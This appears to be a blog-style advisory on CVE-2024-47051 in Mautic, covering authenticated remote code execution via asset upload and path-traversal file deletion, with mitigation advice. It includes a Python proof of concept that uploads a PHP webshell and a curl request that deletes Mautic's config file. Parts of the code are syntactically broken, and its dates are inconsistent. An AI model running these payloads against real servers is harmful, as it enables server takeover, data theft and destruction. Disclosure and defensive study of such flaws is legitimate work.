CVE-2024-47051 - How Authenticated Users Can Take Over Mautic With Two Critical Bugs (RCE & Path Traversal)

In June 2024, security researchers reported two dangerous security vulnerabilities—now tracked as CVE-2024-47051—in Mautic, a popular open-source marketing automation tool. These flaws, present in all versions before Mautic 5.2.3, let attackers with basic user accounts upload and run malicious code and even delete critical files on the server hosting Mautic. Let’s break down how these attacks work, share example attack code, and link you to the details you’ll want to read as a Mautic user or administrator.

What is Mautic?

Mautic is an open-source marketing automation service. Businesses and communities use it to manage newsletters, campaigns, forms, assets, reports, and more — typically self-hosted on their own servers. With thousands of deployments worldwide, a breach of a Mautic install could mean exposing customer data, loss of service, and more.

1. Remote Code Execution (RCE) via Asset Upload

An authenticated user can upload files as assets to Mautic. Due to missing or weak filtering, it’s possible to upload executable files, such as PHP scripts. Once uploaded, the attacker can browse directly to the file and trigger code execution on the server — essentially full server compromise.

2. Path Traversal File Deletion

Mautic fails to properly validate file paths during certain upload/delete operations. With crafted input, an attacker can delete any file on the server that the Mautic process can access, by using directory traversal elements like ../.

References & Original Reports

- Mautic 5.2.3 Release Notes (GitHub)
- Official Mautic Security Advisory
- CVE database entry (NVD) *(link may be pending publication)*

In-Depth: Remote Code Execution via Asset Upload

The Problem:
Mautic’s asset upload feature lets authenticated users (even at low privileges) add files. There is supposed to be a whitelist: only certain extensions allowed (like .jpg, .png, .pdf). But a bug lets attackers bypass this restriction—for example, by double extensions (file.php.jpg) or sneaky content types—and upload a dangerous file (like a PHP script).

Attack Scenario:
1. Attacker logs in with their user account (this could be a hacked low-priv user or a malicious “guest” in some environments).

Attacker uploads a crafted PHP file as a “new asset.”

3. Attacker navigates to the uploaded file in their browser (https://mautic.example.com/media/assets/evil.php), and the server executes the code in it.

Here’s a minimal proof-of-concept using Python and the requests library to upload a PHP webshell

import requests

# Change these!
MAUTIC_URL = 'https://mautic.example.com';
USERNAME = 'attacker@domain.com'
PASSWORD = 'password123'

# Step 1: Log in and get session cookie
session = requests.Session()
login_page = session.get(f"{MAUTIC_URL}/s/login")
csrf_token = login_page.text.split('name="_csrf_token" value="')[1].split('"')[]

login_data = {
    '_username': USERNAME,
    '_password': PASSWORD,
    '_csrf_token': csrf_token
}

r = session.post(f"{MAUTIC_URL}/s/login_check", data=login_data)
assert 'dashboard' in r.text  # crude check for login

# Step 2: Upload malicious PHP file
file_payload = {
    'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/php'),
}

resp = session.post(
    f"{MAUTIC_URL}/s/assets/upload",
    files=file_payload,
    data={'some_field': 'value'}  # adjust as required
)

print("Upload response:", resp.text)

# Step 3: Call the PHP file
print(f"Check your shell at: {MAUTIC_URL}/media/assets/shell.php?cmd=whoami")

> ⚠️ Warning: This is for ethical, educational use only. Never attack systems you don't own or have permission for.

In-Depth: Path Traversal File Deletion

The Problem:
In handling asset deletions or clean-up, Mautic doesn't properly strip path traversal characters from user input—attackers can supply a filename like ../../../../../etc/passwd and delete files outside of the intended assets folder.

Attack Scenario:

Attacker logs in.

2. Calls the asset delete endpoint but with a crafted “filename” pointing to a sensitive file (like /etc/passwd or a Mautic config).

Sample Exploit Request (using curl)

curl -s -X POST \
  -d 'file=../../../../var/www/html/mautic/config/local.php' \
  -b "mautic_session=SESSION_ID_HERE" \
  https://mautic.example.com/s/assets/delete

Replace the session ID and path as needed. If successful, the target file is gone.

Why Are These Bugs So Critical?

- Remote Code Execution means a hacker can run *any* code as the web server user: install malware, steal data, pivot further in your environment, etc.

Arbitrary File Deletion can destroy service, wipe configs, or erase logs to cover tracks.

Combined, these are an attacker’s dream pair—and only require a low-privileged account.

Who Is Affected?

All Mautic installations before version 5.2.3 are affected. This includes both self-hosted and potentially some managed Mautic hosting providers.

Update Mautic to at least v5.2.3 immediately.

See the release notes.

Check logs for unusual asset deletions or access patterns.

- Implement web server restrictions: block execution of PHP in upload/asset directories if possible.
- Restrict user access to trusted members only, review roles/permissions.

Further Reading

- Mautic 5.2.3 Release Notes
- OWASP: Unrestricted File Upload
- OWASP: Path Traversal

Conclusion

CVE-2024-47051 shows how critical it is to keep your marketing and CRM software up to date, and why security controls (like proper file filtering and sanitization) matter everywhere. If you’re running Mautic, upgrade *now* and check that your server is clean—these attacks are simple, devastating, and already public.

Timeline

Published on: 02/26/2025 13:15:39 UTC